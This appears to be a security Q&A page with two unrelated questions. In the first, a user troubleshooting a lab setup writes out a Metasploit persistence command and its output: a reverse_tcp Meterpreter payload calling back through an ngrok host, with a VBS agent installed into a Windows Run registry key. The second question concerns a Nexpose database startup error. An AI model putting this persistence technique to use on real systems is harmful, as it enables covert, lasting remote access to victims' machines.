Knowledge Base

Ask A Question

Questions

1

Reverse TCP persistence doesn't work over internet

Hey guys. I've been playing around with some reverse shells on a couple virtual machines and I've recently gotten it to work over the internet using ngrok to port forward to my local computer, which works great, except for the fact that the "run persistence" attack doesn't work. I've never had problems with "run persistence" when testing on a local network. The command will execute and go through without any errors and it also installs the persistence files on the target, but it doesn't actually execute the persistence script on the target and doesn't report back once the user reboots. If I manually click on the .vbs file on the target, then it'll work and it'll reconnect if I exit the session, so the settings should be good. It still doesn't run the script on start up though. This is the command I run: run persistence -r (IP) -p (port) -i 5 -U -X This is the output: [!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe. [!] Example: run post/windows/manage/persistence_exe OPTION=value [...] [*] Running Persistence Script [*] Resource file for cleanup created at /root/.msf4/logs/persistence/DESKTOP-VH5Q39J_20180216.4315/DESKTOP-VH5Q39J_20180216.4315.rc [*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=11086 [*] Persistent agent script is 99634 bytes long [+] Persistent Script written to C:\Users\admin\AppData\Local\Temp\DUviXBuZA.vbs [*] Executing script C:\Users\admin\AppData\Local\Temp\DUviXBuZA.vbs [+] Agent executed with PID 4500 [*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\nxnYEQiLWTtsYW [+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\nxnYEQiLWTtsYW What's going on? How do I get it to work? I would really appreciate if you guys could help me out! Thanks in advance!

Posted by Ernst Reberto about a year ago

1

Nexpose nxpgsql FATAL semctl()

Hi. It's problem for me "The Security Console is running in maintenance mode, which enables it to perform necessary internal tasks or to recover from the critical failure of one or more of its subsystems. You will not be able to run scans or generate reports while the Security Console is in maintenance mode. For more information, please see the topic Running VM in Maintenance Mode in the VM Administrator's Guide" nsc.log 2018-02-13T11:09:26 [INFO] [Thread: Security Console] Creating NSC config for database type postgresql. 2018-02-13T11:09:26 [INFO] [Thread: Security Console] Starting up postgresql DB system 2018-02-13T11:09:26 [INFO] [Thread: Security Console] PostgreSQL service status: 0. 2018-02-13T11:09:27 [INFO] [Thread: Security Console] PostgreSQL service status: 1. 2018-02-13T11:09:28 [ERROR] [Thread: Security Console] A critical error occured during initialization org.postgresql.util.PSQLException: FATAL: semctl(12582919, 3, SETVAL, 0) failed: Invalid argument at org.postgresql.core.v3.ConnectionFactoryImpl.doAuthentication(ConnectionFactoryImpl.java:443) ~[postgresql-9.4.1212.jar:9.4.1212] at org.postgresql.core.v3.ConnectionFactoryImpl.openConnectionImpl(ConnectionFactoryImpl.java:217) ~[postgresql-9.4.1212.jar:9.4.1212] at org.postgresql.core.ConnectionFactory.openConnection(ConnectionFactory.java:52) ~[postgresql-9.4.1212.jar:9.4.1212] at org.postgresql.jdbc.PgConnection.<init>(PgConnection.java:216) ~[postgresql-9.4.1212.jar:9.4.1212] Any suggetion. Tnx

Posted by John Sartana about a year ago